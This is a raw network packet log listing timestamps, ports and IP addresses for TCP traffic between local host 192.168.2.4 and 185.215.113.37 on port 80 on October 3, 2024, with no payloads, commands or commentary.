Oct 3, 2024 18:38:20.333558083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.333573103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.333589077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.333596945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.333604097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.333621979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.333626032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.333637953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.333653927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.333666086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.333688974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.333724976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.334486008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334502935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334517956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334533930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334536076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.334549904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334559917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.334568024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334583044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334589005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.334600925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.334630013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.334647894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.335345030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.335361958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.335397005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.335453987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.749650002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749721050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749732018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.749758005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749771118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.749793053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749809980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.749829054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749859095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.749886036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.749887943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749923944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749934912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.749975920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.749978065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750011921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750032902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750044107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750077009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750078917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750108957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750108957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750135899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750144005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750161886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750179052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750200033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750207901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750240088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750242949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.750262022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.750284910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751174927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751226902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751234055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751261950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751271963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751298904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751318932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751333952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751363993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751369953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751393080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751426935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751436949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751471043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751486063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751538038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751846075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751883030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751899004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751919031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751935005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751952887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.751971960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.751981974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752002954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752017021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752031088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752051115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752068996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752084970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752111912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752124071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752147913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752155066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752172947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752187014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752204895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752237082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752756119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752789974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752806902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752823114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752841949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752856970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752878904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752892017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752897978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752927065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752953053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752962112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.752990961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.752994061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753014088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753025055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753040075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753077984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753653049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753686905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753701925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753715038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753735065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753748894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753760099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753783941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753813982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753817081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753850937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753851891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753873110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753887892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753906965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753926992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.753937960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.753982067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754589081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754626036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754645109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754659891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754677057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754782915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754798889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754817963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754842043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754851103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754868984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754885912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754909039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754920959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.754955053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.754991055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755515099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755551100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755573034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755584955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755609989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755620956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755651951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755654097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755687952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755688906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755713940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755719900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755738020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755753040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.755767107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.755806923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756439924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756474018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756493092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756506920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756526947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756541014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756551981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756575108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756606102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756608009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756644011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756679058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.756681919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756727934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756727934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.756727934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757196903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757231951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757252932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757265091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757286072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757299900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757317066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757334948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757352114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757368088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757389069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757400990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757421017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757436037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757452965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757469893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757488012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757503986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.757527113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.757554054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758122921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758158922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758176088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758212090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758239031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758272886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758295059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758305073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758325100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758338928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758373022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758374929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758390903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758409023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758433104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758441925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758459091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758476973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758495092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758508921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758527994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758542061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758563995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758574009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.758593082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.758625031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759161949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759213924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759217978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759248018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759267092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759283066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759300947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759319067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759346962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759351969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759371042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759401083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759402990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759439945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759457111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759474039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759494066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759509087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759525061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759541988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.759567022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.759593010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760176897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760210991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760230064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760245085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760266066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760279894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760297060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760313988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760334015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760348082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760365009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760381937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760400057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760413885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760432005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760447979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760473013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760482073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760500908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760516882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.760535002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.760567904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.761181116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761197090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761212111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761226892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761243105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761259079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761266947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.761267900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.761274099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761291027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761305094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761318922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.761320114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.761348009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.761372089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.762182951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762200117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762213945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762229919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762236118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.762244940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762260914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762267113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.762275934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762291908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762306929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762319088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.762324095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762339115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.762342930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.762465000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.762465000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.762985945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763001919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763016939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763032913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763046980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763062000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763062000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763065100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763082027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763098001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763102055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763114929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763124943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763130903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763149023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763186932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763895035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763910055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763925076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763941050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763950109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763957024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763974905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.763988972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.763989925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.764007092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.764023066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.764030933 CEST	49730	80	192.168.2.4	185.215.113.37
